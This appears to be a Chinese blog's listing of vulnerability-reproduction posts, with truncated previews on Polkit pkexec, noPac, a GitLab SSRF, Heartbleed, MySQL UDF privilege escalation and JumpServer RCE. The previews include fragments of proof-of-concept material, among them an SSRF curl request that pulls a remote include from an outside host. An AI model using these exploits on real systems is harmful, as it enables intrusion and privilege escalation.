漏洞复现
内蒙古打野
这个作者很懒,什么都没留下…
展开
-
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
Linux Polkit权限提升漏洞 CVE-2021-4034漏洞描述Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。漏洞影响Polkit > 2009漏洞复现from ctypes import *from ctypes.util import find_libraryimpo原创 2022-01-26 16:53:37 · 7576 阅读 · 0 评论 -
CVE-2021-42287/CVE-2021-42278利用
CVE-2021-42287/CVE-2021-42278利用地址:https://github.com/cube0x0/noPac原创 2021-12-20 11:25:28 · 745 阅读 · 0 评论 -
CVE-2021-22214 Gitlab_SSRF
CVE-2021-22214 Gitlab_SSRF漏洞复现:目标地址:https://gitlab.xxx.xxx/users/sign_inPOCcurl -s --show-error -H 'Content-Type: application/json' https://gitlab.xxx.xxx/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://fbnw原创 2021-12-15 10:58:50 · 2746 阅读 · 0 评论 -
心脏滴血(CVE-2014-0160)
心脏滴血(CVE-2014-0160)漏洞范围:OpenSSL1.0.1版本漏洞成因:Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。漏洞危害:如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的私钥,用户cookie和密码等。漏洞复现:原创 2021-12-15 10:55:00 · 3405 阅读 · 0 评论 -
扫描.DS_Store好用的工具
扫描.DS_Store好用的工具直接pip install dumpalldunpall -u http://xxx.com原创 2021-12-14 17:00:49 · 936 阅读 · 0 评论 -
MySQL udf提权
MySQL udf提权UDF提权这个利用还是不太常见的,因为在mysql5.1版本以后对注册的UDF的位置有了限制,而在默认的是没有\lib\plugin文件夹的,一般需要root用户修改。什么是UDFUDF就是User Defined Function,用户自定义函数,即通过用户添加的函数来对MySQL的功能进行补偿怎么使用UDF我的mysql版本:5.7.26,所以我的是默认没有plugin这个目录的查看secure_file_priv的指secure_file_priv是用来限制load原创 2021-12-02 16:20:11 · 971 阅读 · 0 评论 -
JumpServer RCE漏洞复现
JumpServer RCE一. 漏洞urlhttp://xxx.xxx.xx.xx二. 漏洞详情由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器,执行任意命令。,可以读取jumpserver日志信息,证明漏洞存在。三. 漏洞复现1。运行脚本获取 asset_id,system——user,user_id三个值import asyncioimport reimport websocketsimport原创 2021-09-06 15:40:44 · 311 阅读 · 0 评论